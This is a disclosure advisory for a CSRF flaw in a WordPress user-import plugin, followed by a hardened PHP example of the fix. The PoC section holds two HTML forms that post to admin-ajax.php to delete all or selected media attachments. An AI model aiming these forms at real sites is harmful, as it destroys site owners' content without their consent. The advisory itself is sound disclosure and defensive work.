Import users from CSV with meta [CSRF]
Description
Plugin implements the following AJAX actions:
acui_bulk_delete_attachment
acui_delete_attachment
Both of them delete attachments from the website. Neither introduces CSRF prevention controls. This allows an attacker to leverage the CSRF vulnerability in order to delete all or selected media from the affected website.
Since there also are no capabilities checks, any authenticated user could exploit this vulnerability.
PoC
Bulk delete:
<form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="acui_bulk_delete_attachment">
<button type="submit" value="Submit">Submit</button>
</form>
Selective delete:
<form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="acui_delete_attachment">
<input type="text" name="attach_id" value="" placeholder="Attachment ID">
<button type="submit" value="Submit">Submit</button>
</form>
Solution
Latest versions are patched regarding the acui_delete_attachment action. acui_bulk_delete_attachment appears to still be vulnerable, though it would only delete CSV files uploaded as attachments.
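For reference, this is what an admin-ajax delete handler looks like with the two missing controls in place (an added example written for this advisory, not the plugin's own code). It uses WordPress core APIs only; the action name `myplugin_delete_attachment`, the nonce action `myplugin_delete_attachment_nonce` and the script handle are assumptions chosen for the example.

```php
<?php
// Added example, not the plugin's code. Hardened admin-ajax handler for an
// attachment-delete action. Names prefixed "myplugin_" are assumptions.

add_action( 'wp_ajax_myplugin_delete_attachment', 'myplugin_delete_attachment' );

function myplugin_delete_attachment() {
    // 1. CSRF control: the request must carry a nonce tied to this action and
    //    to the current user's session. check_ajax_referer() terminates the
    //    request (HTTP 403, body "-1") when the nonce is missing or invalid,
    //    so a cross-site form like the PoC above never reaches the delete.
    check_ajax_referer( 'myplugin_delete_attachment_nonce', '_ajax_nonce' );

    // 2. Capability check: the caller must be allowed to delete this
    //    particular attachment, not merely be logged in.
    $attach_id = isset( $_POST['attach_id'] ) ? absint( $_POST['attach_id'] ) : 0;
    if ( ! $attach_id || ! current_user_can( 'delete_post', $attach_id ) ) {
        wp_send_json_error( array( 'message' => 'Not allowed.' ), 403 );
    }

    // 3. Only ever act on attachments, never on arbitrary post IDs.
    if ( 'attachment' !== get_post_type( $attach_id ) ) {
        wp_send_json_error( array( 'message' => 'Not an attachment.' ), 400 );
    }

    // Force deletion (skip the trash) and report the outcome as JSON.
    $deleted = wp_delete_attachment( $attach_id, true );
    if ( ! $deleted ) {
        wp_send_json_error( array( 'message' => 'Delete failed.' ), 500 );
    }
    wp_send_json_success( array( 'attach_id' => $attach_id ) );
}

// The legitimate admin page obtains a nonce server-side and passes it to the
// front-end script, which sends it back as the `_ajax_nonce` POST field.
function myplugin_enqueue_delete_script() {
    wp_enqueue_script(
        'myplugin-delete',
        plugins_url( 'delete.js', __FILE__ ), // assumed script location
        array( 'jquery' ),
        '1.0',
        true
    );
    wp_localize_script( 'myplugin-delete', 'mypluginDelete', array(
        'ajax_url' => admin_url( 'admin-ajax.php' ),
        'nonce'    => wp_create_nonce( 'myplugin_delete_attachment_nonce' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'myplugin_enqueue_delete_script' );
```

The same two lines (`check_ajax_referer()` and a `current_user_can()` check) are what a bulk-delete handler needs as well; the nonce stops the cross-site request, and the capability check stops a low-privilege authenticated user from calling the action directly.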
INFO
- 3 October 2017
- Pan Vag
- codection.com
- wordpress.org
- 1.10.7.1
- WordPress 4.8.1
TIMELINE
- 2017-10-03: Discovered
- 2019-03-17: No longer valid (fixed in the meanwhile)